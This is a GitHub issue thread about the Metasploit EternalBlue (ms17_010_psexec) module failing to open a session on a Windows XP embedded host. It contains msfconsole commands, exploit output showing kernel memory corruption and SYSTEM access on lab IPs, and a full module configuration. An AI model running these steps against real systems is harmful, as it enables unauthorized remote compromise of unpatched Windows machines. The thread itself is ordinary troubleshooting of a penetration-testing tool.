metasploit-framework icon indicating copy to clipboard operation
metasploit-framework copied to clipboard

Published 20 hours ago verified publisher icon rapid7

windows/smb/ms17_010_psexec (EternalBlue) module fails on Vulnerable Windows XP embedded instance

Open L1-0 opened this issue 1 year ago • 4 comments

Steps to reproduce

How'd you do it?

  1. start metasploit
  2. select the specific eternalblue module mentioned below against a specific target 3 . run the module and observe the error

This section should also tell us any relevant information about the environment; for example, if an exploit that used to work is failing, tell us the victim operating system and service versions.

Were you following a specific guide/tutorial or reading documentation?

If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.

Expected behavior

What should happen?

Eternalblue module should open a normal session

Current behavior

What happens instead? Error on receiving smb informations from target

Metasploit version

msf6 exploit(windows/smb/ms17_010_psexec) > version Framework: 6.4.20-dev Console : 6.4.20-dev

Additional Information

If your version is less than 5.0.96, please update to the latest version and ensure your issue is still present.

If the issue is encountered within msfconsole, please run the debug command using the instructions below. If the issue is encountered outisde msfconsole, or the issue causes msfconsole to crash on startup, please delete this section.

  1. Start msfconsole
  2. Run the command set loglevel 3
  3. Take the steps necessary recreate your issue
  4. Run the debug command msf6 exploit(windows/smb/ms17_010_psexec) > run [*] Exploiting target 10.10.10.1

[] Started reverse TCP handler on 10.128.32.72:4444 [] 10.10.10.1:445 - Target OS: Windows 7 Professional 7601 Service Pack 1 [-] 10.10.10.1:445 - Unable to find accessible named pipe! [] Exploiting target 10.10.10.2 [] Started reverse TCP handler on 10.128.32.72:4444 [] 10.10.10.2:445 - Target OS: Windows 5.1 [] 10.10.10.2:445 - Filling barrel with fish... done [] 10.10.10.2:445 - <---------------- | Entering Danger Zone | ----------------> [] 10.10.10.2:445 - [] Preparing dynamite... [] 10.10.10.2:445 - [] Trying stick 1 (x86)...Boom! [] 10.10.10.2:445 - [+] Successfully Leaked Transaction! [] 10.10.10.2:445 - [+] Successfully caught Fish-in-a-barrel [] 10.10.10.2:445 - <---------------- | Leaving Danger Zone | ----------------> [] 10.10.10.2:445 - Reading from CONNECTION struct at: 0x85102a58 [] 10.10.10.2:445 - Built a write-what-where primitive... [+] 10.10.10.2:445 - Overwrite complete... SYSTEM session obtained! [-] 10.10.10.2:445 - Rex::Proto::SMB::Exceptions::ErrorCode [-] 10.10.10.2:445 - The server responded with error: STATUS_BAD_NETWORK_NAME (Command=117 WordCount=0) [-] 10.10.10.2:445 - /usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:256:in smb_recv_parse' /usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:1126:in tree_connect' /usr/share/metasploit-framework/lib/rex/proto/smb/simple_client.rb:178:in connect' /usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb:207:in powershell_installed?' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:154:in smb_pwn' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:129:in exploit' /usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:224:in job_run_proc' /usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:177:in run' /usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in exploit_simple' /usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:172:in exploit_simple' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in exploit_single' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:166:in block in cmd_exploit' /usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:68:in block in each' /usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:163:in <<' /usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:163:in block (3 levels) in parse' /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.57/lib/rex/socket/range_walker.rb:234:in each_host' /usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:158:in block (2 levels) in parse' /usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:120:in each' /usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:120:in block in parse' /usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:67:in each' /usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:67:in each' /usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:67:in each' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:157:in with_index' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:157:in cmd_exploit' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:582:in run_command' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:531:in block in run_single' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in each' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in run_single' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:165:in block in run' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:309:in block in with_history_manager_context' /usr/share/metasploit-framework/lib/rex/ui/text/shell/history_manager.rb:37:in with_context' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:306:in with_history_manager_context' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:133:in run' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in start' /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in start' /usr/bin/msfconsole:23:in

' [*] Exploit completed, but no session was created. msf6 exploit(windows/smb/ms17_010_psexec) > debug Please provide the below information in any Github issues you open. New issues can be opened here https://github.com/rapid7/metasploit-framework/issues/new/choose ENSURE YOU HAVE REMOVED ANY SENSITIVE INFORMATION BEFORE SUBMITTING!

===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse 
[framework/core]
loglevel=3
rhosts=10.10.10.1 10.10.10.2

[framework/ui/console]
ActiveModule=exploit/windows/smb/ms17_010_psexec

[windows/smb/ms17_010_psexec]
WORKSPACE=
VERBOSE=false
WfsDelay=10
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RHOSTS=10.10.10.1 10.10.10.2
RPORT=445
SSL=false
SSLServerNameIndication=
SSLVersion=Auto
SSLVerifyMode=PEER
SSLCipher=
Proxies=
CPORT=
CHOST=
ConnectTimeout=10
TCP::max_send_size=0
TCP::send_delay=0
DCERPC::max_frag_size=4096
DCERPC::fake_bind_multi=true
DCERPC::fake_bind_multi_prepend=0
DCERPC::fake_bind_multi_append=0
DCERPC::smb_pipeio=rw
DCERPC::ReadTimeout=10
NTLM::UseNTLMv2=true
NTLM::UseNTLM2_session=true
NTLM::SendLM=true
NTLM::UseLMKey=false
NTLM::SendNTLM=true
NTLM::SendSPN=true
SMB::pipe_evasion=false
SMB::pipe_write_min_size=1
SMB::pipe_write_max_size=1024
SMB::pipe_read_min_size=1
SMB::pipe_read_max_size=1024
SMB::pad_data_level=0
SMB::pad_file_level=0
SMB::obscure_trans_pipe_level=0
SMBDirect=true
SMBUser=
SMBPass=
SMBDomain=.
SMBName=*SMBSERVER
SMB::VerifySignature=false
SMB::ChunkSize=500
SMB::Native_OS=Windows 2000 2195
SMB::Native_LM=Windows 2000 5.0
SMB::AlwaysEncrypt=true
KrbCacheMode=read-write
SMB::Auth=auto
SMB::Rhostname=
DomainControllerRhost=
SMB::Krb5Ccname=
SMB::KrbOfferedEncryptionTypes=AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1
SERVICE_NAME=
SERVICE_DISPLAY_NAME=
SERVICE_DESCRIPTION=
SERVICE_PERSIST=false
CMD::DELAY=3
NAMED_PIPES=/usr/share/metasploit-framework/data/wordlists/named_pipes.txt
NAMEDPIPE=
LEAKATTEMPTS=99
DBGTRACE=false
CheckModule=auxiliary/scanner/smb/smb_ms17_010
Powershell::persist=false
Powershell::prepend_sleep=
Powershell::prepend_protections_bypass=auto
Powershell::strip_comments=true
Powershell::strip_whitespace=false
Powershell::sub_vars=true
Powershell::sub_funcs=false
Powershell::exec_in_place=false
Powershell::exec_rc4=false
Powershell::remove_comspec=false
Powershell::noninteractive=true
Powershell::encode_final_payload=false
Powershell::encode_inner_payload=false
Powershell::wrap_double_quotes=true
Powershell::no_equals=false
Powershell::method=reflection
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
SHARE=ADMIN$
ALLOW_GUEST=false
SERVICE_FILENAME=
PSH_PATH=Windows\System32\WindowsPowerShell\v1.0\powershell.exe
SERVICE_STUB_ENCODER=

Database Configuration

The database contains the following information:

Collapse 
Session Type: postgresql selected, no connection

Framework Configuration

The features are configured as follows:

Collapse
name enabled
wrapped_tables true
fully_interactive_shells false
manager_commands false
datastore_fallbacks true
metasploit_payload_warnings true
defer_module_loads false
smb_session_type true
postgresql_session_type true
mysql_session_type true
mssql_session_type true
ldap_session_type false
show_successful_logins false
dns true
hierarchical_search_table true

History

The following commands were ran during the session and before this issue occurred:

Collapse 
7      set loglevel 3
8      setg rhosts 10.10.10.1 10.10.10.2
9      search eternalblue
10     use 10
11     run
12     debug

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse 
[10/07/2024 11:20:16] [e(0)] core: Failed to connect to the database: No database YAML file
[10/07/2024 11:20:22] [e(0)] core: Failed to open history file: /home/user/.msf4/history with error: No such file or directory @ rb_sysopen - /home/user/.msf4/history
[10/07/2024 11:56:39] [e(0)] core: Failed to connect to the database: No database YAML file

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse 
msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse 
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_psexec]: reverse to bind
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_psexec]: bind to bind
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_psexec]: noconn to bind
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_psexec]: none to bind
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_psexec]: tunnel to bind
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/bind_tcp_uuid is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_psexec]: reverse to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_psexec]: bind to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_psexec]: noconn to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_psexec]: none to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_psexec]: tunnel to tunnel
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/reverse_http is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_psexec]: reverse to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_psexec]: bind to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_psexec]: noconn to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_psexec]: none to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_psexec]: tunnel to tunnel
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/reverse_https is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_psexec]: reverse to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_psexec]: bind to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_psexec]: noconn to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_psexec]: none to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_psexec]: tunnel to reverse
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/reverse_tcp is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_psexec]: reverse to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_psexec]: bind to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_psexec]: noconn to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_psexec]: none to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_psexec]: tunnel to reverse
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_rc4 is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_psexec]: reverse to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_psexec]: bind to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_psexec]: noconn to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_psexec]: none to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_psexec]: tunnel to reverse
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_uuid is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_psexec]: reverse to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_psexec]: bind to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_psexec]: noconn to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_psexec]: none to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_psexec]: tunnel to tunnel
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/reverse_winhttp is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_psexec]: reverse to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_psexec]: bind to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_psexec]: noconn to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_psexec]: none to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_psexec]: tunnel to tunnel
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/reverse_winhttps is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(0)] core: SMB version(s) to negotiate: [1]
[10/07/2024 11:57:24] [d(0)] core: Negotiated SMB version: SMB1

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse 
msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Collapse 
Framework: 6.4.20-dev
Ruby: ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]
OpenSSL: OpenSSL 3.3.1 4 Jun 2024
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Standard kali install, upgraded

Additional File: NMAP Scan of the affected Host NMAPOutputRedacted.txt

L1-0 avatar Oct 07 '24 11:10 L1-0 

[-] 10.10.10.2:445 - Rex::Proto::SMB::Exceptions::ErrorCode
[-] 10.10.10.2:445 - The server responded with error: STATUS_BAD_NETWORK_NAME (Command=117 WordCount=0)

It seems like the default share used by the exploit (ADMIN$) doesn't exist.

jvoisin avatar Oct 07 '24 23:10 jvoisin

Here's some debugtrace output:

ADMIN$ 
msf6 exploit(windows/smb/ms17_010_psexec) > set dbgtrace true
dbgtrace => true
msf6 exploit(windows/smb/ms17_010_psexec) > setg rhosts 10.10.10.2
rhosts => 10.10.10.2
msf6 exploit(windows/smb/ms17_010_psexec) > check

[*] 10.10.10.2:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.2:445     - Host is likely VULNERABLE to MS17-010! - Windows 5.1
[*] 10.10.10.2:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.2:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.10.10.72:4444
[*] 10.10.10.2:445 - Target OS: Windows 5.1
[*] 10.10.10.2:445 - Filling barrel with fish... done
[*] 10.10.10.2:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.2:445 -         [*] Preparing dynamite...
[*] 10.10.10.2:445 -                 [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.2:445 -         [+] Successfully Leaked Transaction!
[*] 10.10.10.2:445 -         [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.2:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.2:445 - Reading from CONNECTION struct at: 0x84dba7f0
[*] 10.10.10.2:445 - CONNECTION: 0x84dba7f0
[*] 10.10.10.2:445 - SESSION: 0xe2c716d0
[*] 10.10.10.2:445 - FLINK: 0x5bd48
[*] 10.10.10.2:445 - InData: 0x5ae28
[*] 10.10.10.2:445 - MID: 0x15
[*] 10.10.10.2:445 - TRANS1: 0x58b50
[*] 10.10.10.2:445 - TRANS2: 0x5ac90
[*] 10.10.10.2:445 - Built a write-what-where primitive...
[*] 10.10.10.2:445 - Session Data: 0a02a80000000000e009a0840100000000000000180be4a9180be4a9e8000000f0a7db840000000000000000000000000000000000000000104a775f5f19db01c00a855f5f19db01ffffffffffffff7fffffffffffffff7f0000000000000000517878000000000000000000000000000000000000000000000000000000000002000000203d7de204110200021801000100000000010000000000000000000000000000000000001704061cf89020854850c4e250897ce25050c4e258897ce29017c7e29017c7e2000000000200010060f78d840000000006040600464c666cf09ac6e2b8b5c7e201006d000000000003040904464c666c08807ae200000000
[*] 10.10.10.2:445 - session dat len = 256
[*] 10.10.10.2:445 - Session ctx offset = 84
[*] 10.10.10.2:445 - Session ctx data = 203d7de204110200021801000100000000010000000000000000000000000000000000001704061cf89020854850c4e250897ce25050c4e258897ce29017c7e29017c7e2000000000200010060f78d840000000006040600464c666cf09ac6e2b8b5c7e201006d000000000003040904464c666c08807ae200000000
[*] 10.10.10.2:445 - secCtxAddr: e27d3d20
[*] 10.10.10.2:445 - TOKEN data = 4e744c6d537370200000000000000000577878000000000051787800000000000000000000000000ffffffffffffff7fe805a6842302000000000000100000005978780000000000000000000300000000000000000000004c000000f40100000000000000000000c0cb3ae200000000c8a129e2c0cb3ae2c8a129e2000000000200000002000000000000000000000000000000000000000000000000000000d8cb3ae207000000e4cb3ae200000000f0cb3ae20700000001010000000000050700000001010000000000000000000001010000000000050200000000000000000000000000000000000000000000002404061cf8902085b0370fe3a8c22ae2
[*] 10.10.10.2:445 - userAndGroupCount: 0x3
[*] 10.10.10.2:445 - userAndGroupsAddr: 0xe23acbc0
[*] 10.10.10.2:445 - RestrictedSids: 0x0
[*] 10.10.10.2:445 - RestrictedSidCount: 0x0
[+] 10.10.10.2:445 - Overwrite complete... SYSTEM session obtained!
[-] 10.10.10.2:445 - Rex::Proto::SMB::Exceptions::ErrorCode
[-] 10.10.10.2:445 - The server responded with error: STATUS_BAD_NETWORK_NAME (Command=117 WordCount=0)
[-] 10.10.10.2:445 - /usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:256:in `smb_recv_parse'
/usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:1126:in `tree_connect'
/usr/share/metasploit-framework/lib/rex/proto/smb/simple_client.rb:178:in `connect'
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb:207:in `powershell_installed?'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:154:in `smb_pwn'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:129:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:224:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:177:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:172:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:188:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:582:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:531:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:165:in `block in run'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:309:in `block in with_history_manager_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell/history_manager.rb:37:in `with_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:306:in `with_history_manager_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:133:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[*] Exploit completed, but no session was created.
IPC$ 
msf6 exploit(windows/smb/ms17_010_psexec) > setg SHARE IPC$
SHARE => IPC$
msf6 exploit(windows/smb/ms17_010_psexec) > set dbgtrace true
dbgtrace => true
msf6 exploit(windows/smb/ms17_010_psexec) > setg rhosts 10.10.10.2
rhosts => 10.10.10.2
msf6 exploit(windows/smb/ms17_010_psexec) > check

[*] 10.10.10.2:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.2:445     - Host is likely VULNERABLE to MS17-010! - Windows 5.1
[*] 10.10.10.2:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.2:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.10.10.72:4444
[*] 10.10.10.2:445 - Target OS: Windows 5.1
[*] 10.10.10.2:445 - Filling barrel with fish... done
[*] 10.10.10.2:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.2:445 -         [*] Preparing dynamite...
[*] 10.10.10.2:445 -                 [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.2:445 -         [+] Successfully Leaked Transaction!
[*] 10.10.10.2:445 -         [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.2:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.2:445 - Reading from CONNECTION struct at: 0x84dbe468
[*] 10.10.10.2:445 - CONNECTION: 0x84dbe468
[*] 10.10.10.2:445 - SESSION: 0xe26bd940
[*] 10.10.10.2:445 - FLINK: 0x5bd48
[*] 10.10.10.2:445 - InData: 0x5ae28
[*] 10.10.10.2:445 - MID: 0xa
[*] 10.10.10.2:445 - TRANS1: 0x58b50
[*] 10.10.10.2:445 - TRANS2: 0x5ac90
[*] 10.10.10.2:445 - Built a write-what-where primitive...
[*] 10.10.10.2:445 - Session Data: 0a02a80000000000608836850100000000000000180be4a9180be4a9e700000068e4db840000000000000000000000000000000000000000f0589c065f19db01a019aa065f19db01ffffffffffffff7fffffffffffffff7f0000000000000000a75b780000000000000000000000000000000000000000000000000000000000020000007004cee204110200011801000100000000010000000000000000000000000000000000001704061cf890208568da6be240d877e270da6be248d877e200da6be200da6be2000000000200010008a79d840000000006040300464c666cc83a77e238ca6ae201000000000000000304061cf890208590d976e2e03a77e2
[*] 10.10.10.2:445 - session dat len = 256
[*] 10.10.10.2:445 - Session ctx offset = 84
[*] 10.10.10.2:445 - Session ctx data = 7004cee204110200011801000100000000010000000000000000000000000000000000001704061cf890208568da6be240d877e270da6be248d877e200da6be200da6be2000000000200010008a79d840000000006040300464c666cc83a77e238ca6ae201000000000000000304061cf890208590d976e2e03a77e2
[*] 10.10.10.2:445 - secCtxAddr: e2ce0470
[*] 10.10.10.2:445 - TOKEN data = 4e744c6d537370200000000000000000ad5b780000000000a75b7800000000000000000000000000ffffffffffffff7f98feaa84210200000000000010000000af5b780000000000000000000300000000000000000000004c000000f40100000000000000000000d0c07ae20000000080f431e2d0c07ae280f431e2000000000200000002000000000000000000000000000000000000000000000000000000e8c07ae207000000f4c07ae20000000000c17ae20700000001010000000000050700000001010000000000000000000001010000000000050200000025020000260200000e0000001203000002000000240403002602000088e03e866014c9e2
[*] 10.10.10.2:445 - userAndGroupCount: 0x3
[*] 10.10.10.2:445 - userAndGroupsAddr: 0xe27ac0d0
[*] 10.10.10.2:445 - RestrictedSids: 0x0
[*] 10.10.10.2:445 - RestrictedSidCount: 0x0
[+] 10.10.10.2:445 - Overwrite complete... SYSTEM session obtained!
[-] 10.10.10.2:445 - Rex::Proto::SMB::Exceptions::ErrorCode
[-] 10.10.10.2:445 - The server responded with error: STATUS_OBJECT_PATH_SYNTAX_BAD (Command=45 WordCount=0)
[-] 10.10.10.2:445 - /usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:256:in `smb_recv_parse'
/usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:1270:in `open'
/usr/share/metasploit-framework/lib/rex/proto/smb/simple_client.rb:224:in `open'
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client.rb:275:in `smb_file_exist?'
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb:209:in `powershell_installed?'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:154:in `smb_pwn'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:129:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:224:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:177:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:172:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:188:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:582:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:531:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:165:in `block in run'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:309:in `block in with_history_manager_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell/history_manager.rb:37:in `with_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:306:in `with_history_manager_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:133:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[*] Exploit completed, but no session was created.

Would it fail earlier if powershell is not installed/enabled on target?

L1-0 avatar Oct 08 '24 06:10 L1-0

But are the share ADMIN$ and IPC$ exciting/exposed on the target?

jvoisin avatar Oct 08 '24 13:10 jvoisin

Yes, the IPC$ one is, ADMIN$ does not exist however.

L1-0 avatar Oct 09 '24 09:10 L1-0

Hi!

